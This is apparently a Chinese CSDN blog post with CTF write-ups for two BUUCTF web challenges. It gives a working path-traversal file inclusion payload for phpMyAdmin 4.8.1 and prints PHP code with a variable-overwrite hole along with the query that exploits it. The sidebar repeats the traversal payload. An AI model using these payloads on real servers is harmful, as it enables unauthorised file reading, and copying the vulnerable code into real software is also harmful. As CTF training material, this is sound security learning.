BUUCTF Web [GWCTF 2019]我有一个数据库1 & [BJDCTF2020]Mark loves cat1

最新推荐文章于 2024-01-31 18:28:18 发布
最新推荐文章于 2024-01-31 18:28:18 发布
阅读量584 收藏
点赞数
分类专栏: BUUCTF Web 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64558270/article/details/126963103
版权

[GWCTF 2019]我有一个数据库1

 启动靶机,发现并没什么有用信息,用dirsearch跑一下

爆破出了几个phpmyadmin目录下的几个文件

看一下第一个url 

可以看到版本是4.8.1,百度一下这个版本的通用漏洞,phpmyadmin 4.8.1 本地文件包含漏洞

既然可以文件包含,直接构造payload:

phpmyadmin/?target=db_sql.php%253f/../../../../../../../../flag

拿到flag         flag{603c33be-3f63-4868-97b3-f5468d21c535}  

[BJDCTF2020]Mark loves cat1

启动靶机,测试了几个功能点,没什么发现,先上工具跑吧

 虽然dirsearch只跑了百分之六,但是已经跑了好几个git目录下的文件了,猜测这道题关于git泄露的,所以直接换GitHack跑 (我爱脚本)

发现两个php文件,读源码

<?php
    include 'flag.php';

    $yds = "dog";
    $is = "cat";
    $handsome = 'yds';

    foreach($_POST as $x => $y){   
        $$x = $y;  //POST型声明至当前文件
    }

    foreach($_GET as $x => $y){
        $$x = $$y; //GET型变量重新赋值为当前文件变量中以其值为键名的值   
    }

    foreach($_GET as $x => $y){
        if($_GET['flag'] === $x && $x !== 'flag'){ //如果GET型中flag变量的值等于GET型中一个不为flag的键名则退出
            
            exit($handsome); //exit显然能利用
        }
    }
    //如果GET型和POST型中都没有变量flag,则退出
    if(!isset($_GET['flag']) && !isset($_POST['flag'])){ 
        exit($yds);
    }

    if($_POST['flag'] === 'flag'  || $_GET['flag'] === 'flag'){
        exit($is);
    }

    echo "the flag is: ".$flag;

?>

 代码审计,需要传带flag的参数,尝试绕过第二个if语句

构造payload:

/index.php?yds=flag

 拿到flag (页面最下方)      ​​​​​flag{9a97bf85-5e8f-41c4-9a85-d1416d634378}

WmVicmE=
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
BUUCTF- 我有一个数据库
qq_45393916的博客
03-03 3888
BUUCTF--我有一个数据库(靶场思路)
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
变量覆盖漏洞 自定义的参数值替换原有变量值的情况称为变量覆盖漏洞 经常导致变量覆盖漏洞场景有:$使用不当,extract()函数使用不当,parse_str()函数使用不当,import_...对于数组中的每个元素,键名用于变量值
Buuctf-我有一个数据库
bin789456的博客
11-28 2395
写在前面 从结果来看,这道题并不难,但是这个漏洞查找思想和poc查找思路很好,记下来。 WP
buuctf-[[GWCTF 2019]我有一个数据库(小宇特详解)
小宇的web博客
02-12 586
buuctf-[[GWCTF 2019]我有一个数据库(小宇特详解) 这里不知道什么原因显示的乱码 直接使用dirsearch对网站进行扫描吧 这里扫到了phpmyadmin目录,无密码直接登录成功。 这里给出了版本号MySQL数据库Version 4.8.1。 这个版本有文件包含漏洞 漏洞原理是 利用/使db_datadict.php?成为一个不存在目录,利用include函数的目录不断跳转尝试得到flag目录。 payload phpmyadmin/index.php?target=db_datadi
BUUCTF 我有一个数据库 Mark loves cat
wwwwyyyrre的博客
04-03 181
得到flag flag{4281d569-f7c1-4095-91cf-975c2e8a9a2d}这个是4.8.1版本的数据库有漏洞可以利用(CVE-2018-12613)这里利用的就是exit函数里面的三个 handsome yds is来绕过。打开链接 没看到有用的信息 查看源代码也没有什么信息 尝试扫一下后台。这一块的意思是 post传参 输入$x=$y 回显就是$$x=$y。这一块的意思是 get传参 输入$x=$y 回显是$$x=$$y。打开图片是乱码 源代码也没有任何的东西 扫描一下后台。
BUUCTF WEB [GWCTF 2019]我有一个数据库
Y1da的博客
04-27 361
BUUCTF WEB [GWCTF 2019]我有一个数据库 刷新后查看响应包 <!DOCTYPE html> <html> <head> <title>空的数据库</title> </head> <body> <h1>我有一个数据库,但里面什么也没有~</h1> <h1>不信你找</h1> </body> </html> 没有什么其他
1SMB30CAT3G的技术参数
12-10
产品型号:1SMB30CAT3G峰值反向工作电压VRWM(V):30雪崩电压VBRmin(V):33.300IT(mA):1最大反向电压(钳位电压)Vc(V):48.400最大反向浪涌电流Ipp(A):12.400最大反向漏电流IR(uA):5芯片标识(MARK):MKC封装/温度(℃):SMB/-...
1SMB26CAT3G的技术参数
12-10
产品型号:1SMB26CAT3G峰值反向工作电压VRWM(V):26雪崩电压VBRmin(V):28.900IT(mA):1最大反向电压(钳位电压)Vc(V):42.100最大反向浪涌电流Ipp(A):9.500最大反向漏电流IR(uA):2.500芯片标识(MARK):SEC封装/温度(℃):...
1SMB36CAT3G的技术参数
12-10
产品型号:1SMB36CAT3G峰值反向工作电压VRWM(V):36雪崩电压VBRmin(V):40IT(mA):1最大反向电压(钳位电压)Vc(V):58.100最大反向浪涌电流Ipp(A):10.300最大反向漏电流IR(uA):5芯片标识(MARK):MPC封装/温度(℃):SMB/-65~...
1SMB28CAT3G的技术参数
12-10
产品型号:1SMB28CAT3G峰值反向工作电压VRWM(V):28雪崩电压VBRmin(V):31.100IT(mA):1最大反向电压(钳位电压)Vc(V):45.400最大反向浪涌电流Ipp(A):8.800最大反向漏电流IR(uA):2.500芯片标识(MARK):SGC封装/温度(℃):...
[GWCTF 2019]我有一个数据库 wp
m0_55185160的博客
04-23 4328
得到了/phpmyadmin/路径,加上题目是我有一个数据库,于是想到应该本题就是和phpmyadmin数据库有关 我们可以看到phpmyadmin的版本为4.8.1,搜索后发现这个版本的phpmyadmin存在漏洞CVE-2018-12613,下面我们复现一下漏洞。 首先分析一下源码: index.php 关于target的部分 $target_blacklist = array ( 'imp..
[GWCTF 2019]我有一个数据库 1
qq_43618536的博客
07-21 664
[GWCTF 2019]我有一个数据库 1
[BUUCTF刷题]我有一个数据库
weixin_43952190的博客
07-02 1182
我有一个数据库 cve-2018-12613-PhpMyadmin后台文件包含 进去后出现乱码的文字,扫描目录发现/phpmyadmin 发现其版本为phpmyadmin4.18,搜索相关版本的漏洞。 利用poc target=db_datadict.php%253f/../../../../../../../../flag 漏洞分析: 问题在index.php的55~63: // If we have a valid target, let's load that script instead
web buuctf [GWCTF 2019]我有一个数据库1
weixin_44214568的博客
03-26 3416
1.直接放弃御剑了,在buu上扫不到,我自己登录先看了一下有没有robots.txt,有,但是没有扫到,我用了disearch,设置了s之后可以扫到了 py dirsearch -u url -e * -s 1 扫描出来
[GWCTF 2019]我有一个数据库(特详解)
热门推荐
qq_74806534的博客
01-31 1万+
记下来就是利用文章里的payload了,这里../回到上一级目录,只要多于5个,能回到根目录就行,etc/passwd是linux存放用户和密码的文件,在根目录。页面一开始乱码,先教大家应该修复的方法,到火狐打开,然后找到小工具里的修复文字编码,就可以了(没有的话可以在定制工具栏里添加)在界面可以查到各服务器的版本,可以去百度各版本服务器的漏洞。他说什么都没有,先dirsearch扫一下。直接看上面那个师傅的文章,十分详细的。查看其他的吧,有个数据库看看去。这里就不一样查了,直接上结论。
[GWCTF 2019]我有一个数据库1
whale_waves的博客
12-11 416
#我的上一篇博客附上了dirsearch的下载地址以及简单用法。这里扫出来了phpmyadmin/index.php。这里能看到phpmyadmin的版本信息。直接把phpinfo.php放出来了。然而这道题是想让我们通过版本漏洞做题。这里看起来不像是加密应该是编码错误。这里访问robots.txt。用dirsearch扫了一遍。这里我附上版本漏洞复现的博客。其实遇到这种的页面要做的事。这里能看到它所有的信息。这里并没有能找到可控点。
[GWCTF 2019]我有一个数据库(CVE-2018-12613)
记录学习,一起进步
01-29 264
[GWCTF 2019]我有一个数据库(CVE-2018-12613)
scanf("%f", &mark);
最新发布
03-01
scanf("%f", &mark)是C语言中的一个输入函数,用于从标准输入(通常是键盘)读取一个浮点数,并将其存储到变量mark中。 具体解释如下: - scanf是C语言中的一个库函数,用于从标准输入读取数据。 - "%f"是格式控制字符串,指定了要读取的数据类型为浮点数。 - &mark表示将读取到的浮点数存储到变量mark的地址中,&是取地址运算符。 使用scanf函数时,程序会等待用户在标准输入中输入一个浮点数,然后将其存储到mark变量中。注意,输入的浮点数需要以换行符或空格作为结束符号。 示例代码如下: ```c #include <stdio.h> int main() { float mark; printf("请输入一个浮点数:"); scanf("%f", &mark); printf("您输入的浮点数是:%f\n", mark); return 0; } ```

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

WmVicmE=

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值